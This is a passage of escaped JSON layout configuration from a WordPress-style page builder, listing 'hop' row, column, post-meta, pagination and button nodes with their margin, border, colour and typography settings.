"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":2,\"verticalGap\":2}},\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":2}}},\"showMasonry\":true},\"v\":\"1.1\",\"nodes\":[\"435-m3\"]},{\"id\":110,\"type\":\"hop-loop-item\",\"nodeId\":\"26-m7\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(1, 51, 74, 0.15)\",\"spread\":\"0\",\"y\":\"10\",\"blur\":\"40\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m4\"],\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":111,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"26-m19\",\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}},\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"435-m5\"]},{\"id\":112,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3,\"horizontalGap\":3,\"verticalGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"mobile\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"type\":\"hop-row\",\"nodeId\":\"1726-m24\",\"v\":\"1.1\",\"nodes\":[\"435-m6\"],\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},{\"id\":113,\"type\":\"hop-column\",\"nodeId\":\"1726-m25\",\"style\":{\"textAlign\":\"left\",\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m7\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3}}}}},{\"id\":114,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c23\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m8\"]},{\"id\":115,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m9\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m9\"]},{\"id\":116,\"type\":\"hop-post-title\",\"nodeId\":\"26-m10\",\"style\":{\"descendants\":{\"title\":{\"transition\":{\"duration\":{\"value\":\"0.5\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m10\"]},{\"id\":117,\"type\":\"hop-post-excerpt\",\"nodeId\":\"26-m11\",\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m11\"]},{\"id\":118,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"equalHeight\":true,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"mobile\":{\"layout\":{\"itemsPerRow\":2,\"horizontalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"verticalGap\":0}}}},\"type\":\"hop-row\",\"nodeId\":\"1706-c20\",\"v\":\"1.1\",\"nodes\":[\"435-m12\"]},{\"id\":119,\"type\":\"hop-column\",\"nodeId\":\"1726-m20\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m13\"]},{\"id\":120,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m25\",\"nodes\":[\"435-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"decoration\":\"none\"}},\"icons\":{\"display\":\"inline-block\",\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}}}}}},{\"id\":121,\"type\":\"hop-column\",\"nodeId\":\"1726-m21\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m15\"]},{\"id\":122,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"19-m32\",\"nodes\":[\"435-m16\"],\"v\":\"1.1\"},{\"id\":123,\"type\":\"hop-post-read-more\",\"nodeId\":\"19-m33\",\"nodes\":[\"435-m17\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"}},{\"id\":124,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalAlign\":\"end\"},\"media\":{\"mobile\":{\"layout\":{\"horizontalAlign\":\"center\"}}}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m18\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":125,\"type\":\"hop-column\",\"nodeId\":\"19-m37\",\"nodes\":[\"435-m19\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":126,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m20\",\"v\":\"1.1\",\"nodes\":[\"435-m20\"],\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"bottom\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}}}}}}},{\"id\":127,\"type\":\"hop-column\",\"nodeId\":\"19-m39\",\"nodes\":[\"435-m21\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":128,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m22\"]},{\"id\":129,\"type\":\"hop-column\",\"nodeId\":\"19-m38\",\"nodes\":[\"435-m23\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":130,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m21\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"border\":{\"bottom\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"top\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"left\":{\"color\":\"${theme.colors.5}\"},\"right\":{\"color\":\"${theme.colors.5}\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m24\"]},{\"id\":131,\"type\":\"hop-main\",\"nodeId\":\"35-m1\",\"v\":\"1.1\",\"nodes\":[\"22-m1\",\"636-m1\"]},{\"id\":132,\"type\":\"hop-row\",\"nodeId\":\"1735-m2\",\"props\":{\"layout\":{\"itemsPerRow\":2,\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"22-m2\",\"636-m2\"]},{\"id\":133,\"type\":\"hop-column\",\"nodeId\":\"35-m3\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-m3\",\"636-m3\"]},{\"id\":134,\"type\":\"hop-heading\",\"nodeId\":\"1735-m11\",\"style\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"size\":{\"unit\":\"em\",\"value\":\"10\"}}},\"props\":{\"headerType\":\"2\"},\"v\":\"1.1\",\"nodes\":[\"22-m4\",\"636-m4\"]},{\"id\":135,\"type\":\"hop-text\",\"nodeId\":\"1735-m12\",\"v\":\"1.1\",\"nodes\":[\"22-m5\",\"636-m5\"]},{\"id\":136,\"type\":\"hop-home-button-group\",\"nodeId\":\"22-m8\",\"v\":\"1.1\",\"nodes\":[\"22-m6\",\"636-m6\"]},{\"id\":137,\"type\":\"hop-home-button\",\"nodeId\":\"22-m9\",\"style\":{\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(2, 110, 159, 0)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"transform\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.5\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"descendants\":{\"icon\":{\"size\":{\"value\":\"16\",\"unit\":\"px\"},\"margin\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"textAlign\":\"center\"},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"},\"v\":\"1.1\",\"nodes\":[\"22-m7\",\"636-m7\"]},{\"id\":138,\"type\":\"hop-main\",\"nodeId\":\"38-m1\",\"v\":\"1.1\",\"nodes\":[\"25-m1\",\"639-m1\"]},{\"id\":139,\"type\":\"hop-archive-loop\",\"nodeId\":\"1738-m4\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1,\"horizontalAlign\":\"start\",\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"showMasonry\":false,\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"25-m2\",\"639-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":140,\"type\":\"hop-loop-item\",\"nodeId\":\"1706-c10\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"y\":\"10\",\"spread\":\"0\",\"blur\":\"40\",\"color\":\"rgba(1, 51, 74, 0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"25-m3\",\"639-m3\"],\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":141,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"25-m20\",\"nodes\":[\"25-m4\",\"639-m4\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":142,\"type\":\"hop-column\",\"nodeId\":\"25-m21\",\"nodes\":[\"25-m5\",\"639-m5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"}},{\"id\":143,\"type\":\"hop-post-categories\",\"nodeId\":\"1738-m11\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"typography\":{\"transform\":\"lowercase\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m6\",\"639-m6\"]},{\"id\":144,\"type\":\"hop-post-title\",\"nodeId\":\"38-m7\",\"v\":\"1.1\",\"nodes\":[\"25-m7\",\"639-m7\"]},{\"id\":145,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c21\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"transform\":\"lowercase\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}},\"display\":\"none\"},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant1}\"}},\"separators\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"v\":\"1.1\",\"nodes\":[\"25-m8\",\"639-m8\"]},{\"id\":146,\"type\":\"hop-post-excerpt\",\"nodeId\":\"38-m8\",\"v\":\"1.1\",\"nodes\":[\"25-m9\",\"639-m9\"],\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":147,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"25-m20\",\"nodes\":[\"25-m10\",\"639-m10\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":20,\"unit\":\"%\"}}}}}},{\"id\":148,\"type\":\"hop-post-read-more\",\"nodeId\":\"25-m21\",\"nodes\":[\"25-m11\",\"639-m11\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}},\"image\":{\"boxShadow\":{\"enabled\":false,\"layers\":[{\"x\":\"2\",\"y\":\"2\",\"spread\":\"10\",\"blur\":\"2\",\"color\":\"#333\"}]}},\"frameImage\":{\"backgroundColor\":\"transparent\",\"width\":{\"value\":100},\"height\":{\"value\":100},\"thickness\":10,\"border\":{\"top\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"bottom\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"left\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"right\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 